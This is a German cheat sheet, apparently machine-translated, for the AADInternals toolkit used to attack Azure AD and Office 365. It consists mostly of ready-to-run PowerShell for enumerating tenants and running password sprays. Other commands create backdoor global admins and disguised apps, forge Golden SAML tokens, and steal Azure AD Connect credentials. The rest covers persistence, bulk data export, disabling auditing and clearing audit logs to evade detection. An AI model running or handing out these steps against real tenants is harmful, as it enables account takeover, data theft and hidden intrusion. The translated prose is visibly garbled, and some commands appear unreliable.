AADInternals Azure AD Exploitation Toolkit Cheat Blatt

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

AADInternals ist eine Macht Shell-Modul von Dr. Nestori Syynimaa für die Verwaltung und Nutzung von Azure Active Directory und Office 365 entwickelt. Es bietet umfassende Fähigkeiten für Azure AD Aufklärung, Ausbeutung und Post-Exploitation Aktivitäten.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Installation von PowerShell

```powershell

Install from PowerShell Gallery

Install-Module AADInternals

Install specific version

Install-Module AADInternals -RequiredVersion 0.9.3

Install for current user only

Install-Module AADInternals -Scope CurrentUser

Update existing installation

Update-Module AADInternals ```_

Manuelle Installation

```powershell

Download from GitHub

Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip" Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"

Import module

Import-Module C:\Tools\AADInternals-master\AADInternals.psd1

Install dependencies

Install-Module -Name MSAL.PS Install-Module -Name Microsoft.Graph ```_

Docker Installation

```bash

Run AADInternals in Docker with PowerShell

docker run -it mcr.microsoft.com/powershell:latest pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals" ```_

Basisnutzung

Modul Import und Setup

```powershell

Import AADInternals module

Import-Module AADInternals

Get module information

Get-Module AADInternals

List available commands

Get-Command -Module AADInternals

Get help for specific command

Get-Help Get-AADIntAccessTokenForAADGraph -Full ```_

Authentifizierungsmethoden

```powershell

Interactive authentication

$cred = Get-Credential $accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

Device code authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode

Certificate authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId

Refresh token authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken ```_

Befehlsnummer

Authentication Commands

| | Command | Description | | | --- | --- | | | Get-AADIntAccessTokenForAADGraph | Get access token for AAD Graph | | | | Get-AADIntAccessTokenForMSGraph | Get access token for MS Graph | | | | Get-AADIntAccessTokenForEXO | Get access token for Exchange Online | | | | Get-AADIntAccessTokenForSPO | Get access token for SharePoint Online | | | | Get-AADIntAccessTokenForTeams | Get access token for Teams | |

Reconnaissance Commands

| | Command | Description | | | --- | --- | | | Get-AADIntTenantID | Get tenant ID from domain | | | | Get-AADIntTenantDomains | Get tenant domains | | | | Get-AADIntCompanyInformation | Get company information | | | | Get-AADIntUsers | Get Azure AD users | | | | Get-AADIntGroups | Get Azure AD groups | | | | Get-AADIntApplications | Get applications | |

Exploitation Commands

| | Command | Description | | | --- | --- | | | New-AADIntBackdoor | Create backdoor user | | | | Set-AADIntUserPassword | Set user password | | | | Add-AADIntUserToGroup | Add user to group | | | | Grant-AADIntAppRoleToServicePrincipal | Grant app permissions | | | | New-AADIntGlobalAdmin | Create global admin | |

Aufklärung und Information

Tenant Discovery

```powershell

Get tenant ID from domain

$tenantId = Get-AADIntTenantID -Domain "company.com"

Get tenant domains

$domains = Get-AADIntTenantDomains -Domain "company.com"

Get company information

$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken

Get tenant details

$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken ```_

Benutzeraufzählung

```powershell

Get all users

$users = Get-AADIntUsers -AccessToken $accessToken

Get specific user

$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"

Get user's group memberships

$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"

Get user's roles

$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"

Search users by attribute

$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin" ```_

Gruppenaufzählung

```powershell

Get all groups

$groups = Get-AADIntGroups -AccessToken $accessToken

Get group members

$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId

Get privileged groups

$adminGroups = Get-AADIntGroups -AccessToken $accessToken|Where-Object \\{$_.displayName -like "admin"\\}

Get group owners

$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId ```_

Anmeldung und Service Hauptaufzählung

```powershell

Get all applications

$apps = Get-AADIntApplications -AccessToken $accessToken

Get service principals

$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken

Get application permissions

$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId

Get OAuth permissions

$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken ```_

Exploitation Techniken

Passwort-Angriffe

```powershell

Password spray attack

$users = Get-AADIntUsers -AccessToken $accessToken $passwords = @("Password123", "Summer2024", "Company123")

foreach ($password in $passwords) \\{ foreach ($user in $users) \\{ try \\{ $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password Write-Host "Success: $($user.userPrincipalName):$password" \\} catch \\{ # Password failed \\} \\} \\}

Set user password (requires privileges)

Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123" ```_

Vorrechte Eskalation

```powershell

Create global administrator

New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"

Add user to privileged group

Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId

Grant application permissions

Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId

Create application with high privileges

$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions ```_

Backdoor Creation

```powershell

Create backdoor user

$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"

Create backdoor application

$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges

Create service principal for backdoor

$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId

Grant backdoor permissions

Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId ```_

Token Manipulation

```powershell

Get access token for different resources

$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken $exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken $spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken

Parse JWT token

$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken

Get refresh token

$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken

Use refresh token for persistence

$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken ```_

Fortgeschrittene Angriffe

Golden SAML Angriff

```powershell

Export ADFS certificate (requires ADFS access)

$cert = Export-AADIntADFSCertificate

Create Golden SAML token

$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"

Use Golden SAML to get access token

$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken ```_

Azure AD Connect Angriffe

```powershell

Get Azure AD Connect information

$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken

Extract Azure AD Connect credentials (requires local admin on AAD Connect server)

$adConnectCreds = Get-AADIntAzureADConnectCredentials

Use extracted credentials

$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds ```_

Pass-the-Hash Angriffe

```powershell

Use NTLM hash for authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash

Use Kerberos ticket

$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket ```_

Geräteregistrierung Angriffe

```powershell

Register malicious device

$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId

Get device certificate

$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId

Use device certificate for authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert ```_

Persistenztechniken

Anwendungsbasierte Persistenz

```powershell

Create persistent application

$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions

Add application secret

$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId

Use application for persistence

$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId ```_

Benutzerbasiertes Persistence

```powershell

Create service account

$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"

Assign privileged roles

Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"

Disable account auditing

Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false ```_

Zertifikatsbasierte Persistence

```powershell

Generate certificate for authentication

$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

Add certificate to application

Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert

Use certificate for authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId ```_

Daten Exfiltration

Benutzerdatenextraktion

```powershell

Export all users with detailed information

$users = Get-AADIntUsers -AccessToken $accessToken $users|Export-Csv -Path "users.csv" -NoTypeInformation

Export user photos

foreach ($user in $users) \\{ $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName if ($photo) \\{ [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo) \\} \\}

Export user's OneDrive files

$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com" ```_

Gruppen- und Rolleninformationen

```powershell

Export group memberships

$groups = Get-AADIntGroups -AccessToken $accessToken foreach ($group in $groups) \\{ $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id $group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members \\} | $groups | ConvertTo-Json -Depth 3 | Out-File "groups.json" |

Export role assignments

$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken foreach ($role in $roles) \\{ $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id $role|Add-Member -NotePropertyName "Members" -NotePropertyValue $members \\} | $roles | ConvertTo-Json -Depth 3 | Out-File "roles.json" | ```_

Bewerbungs- und Genehmigungsdaten

```powershell

Export applications with permissions

$apps = Get-AADIntApplications -AccessToken $accessToken foreach ($app in $apps) \\{ $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id $app|Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions \\} | $apps | ConvertTo-Json -Depth 3 | Out-File "applications.json" |

Export OAuth consent grants

$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken $consents|Export-Csv -Path "oauth_consents.csv" -NoTypeInformation ```_

Evasion Techniken

Stealth Operationen

```powershell

Use legitimate application names

$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions

Mimic legitimate service accounts

$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"

Use existing application IDs

$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret # Graph Explorer ```_

Geschwindigkeitsbegrenzung und Drosselung

```powershell

Implement delays between requests

function Invoke-AADIntWithDelay \\{ param($Command, $Delay = 1)

& $Command
Start-Sleep -Seconds $Delay

\\}

Randomize request timing

$users = Get-AADIntUsers -AccessToken $accessToken foreach ($user in $users) \\{ $delay = Get-Random -Minimum 1 -Maximum 5 Start-Sleep -Seconds $delay $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName \\} ```_

Log Evasion

```powershell

Use service principal instead of user account

$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId

Perform actions during business hours

$currentHour = (Get-Date).Hour if ($currentHour -ge 9 -and $currentHour -le 17) \\{ # Perform stealthy operations \\}

Use legitimate IP ranges

Ensure operations are performed from expected geographic locations

```_

Defensive Evasion

Anti-Detektionsmaßnahmen

```powershell

Check for monitoring

$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"

Verify current permissions

$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

Check for Conditional Access policies

$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken

Monitor for security alerts

$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken ```_

Reinigungsoperationen

```powershell

Remove created applications

Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId

Remove created users

Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"

Remove role assignments

Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"

Clear audit logs (if possible)

Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs" ```_

Fehlerbehebung

Authentifizierungsfragen

```powershell

Debug authentication

$DebugPreference = "Continue" $accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

Check token validity

$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken $tokenInfo.exp # Check expiration

Refresh expired token

$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken ```_

Genehmigungsfragen

```powershell

Check current permissions

$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

Test specific permission

Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"

Get required permissions for command

Get-AADIntRequiredPermissions -Command "Get-AADIntUsers" ```_

API Einschränkungen

```powershell

Handle rate limiting

try \\{ $users = Get-AADIntUsers -AccessToken $accessToken \\} catch \\{ if ($_.Exception.Message -like "throttled") \\{ Start-Sleep -Seconds 60 $users = Get-AADIntUsers -AccessToken $accessToken \\} \\}

Use pagination for large datasets

$users = @() $skip = 0 do \\{ $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip $users += $batch $skip += 100 \\} while ($batch.Count -eq 100) ```_

Integration mit anderen Tools

BlutHound Integration

```powershell

Export data for BloodHound

$users = Get-AADIntUsers -AccessToken $accessToken $groups = Get-AADIntGroups -AccessToken $accessToken

Convert to BloodHound format

$bloodhoundData = @\\{ users = $users|ForEach-Object \\{ @\\{ ObjectIdentifier = $.id Properties = @\\{ name = $.userPrincipalName displayname = $.displayName enabled = $.accountEnabled \\} \\} \\} \\}

| $bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "bloodhound_data.json" | ```_

PowerShell Empire Integration

```powershell

Use AADInternals in Empire agent

$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode $users = Get-AADIntUsers -AccessToken $accessToken | $users | ConvertTo-Json | Out-File "C:\temp\aad_users.json" | ```_

Ressourcen

• AADInternals GitHub Repository
• AADInternals Dokumentation
• Dr. Nestori Syynimaa Blog
• (__LINK_5___)
• [Office 365 Security](_LINK_5___

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von AADInternals. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie Azure AD Sicherheitsbewertungen durchführen. *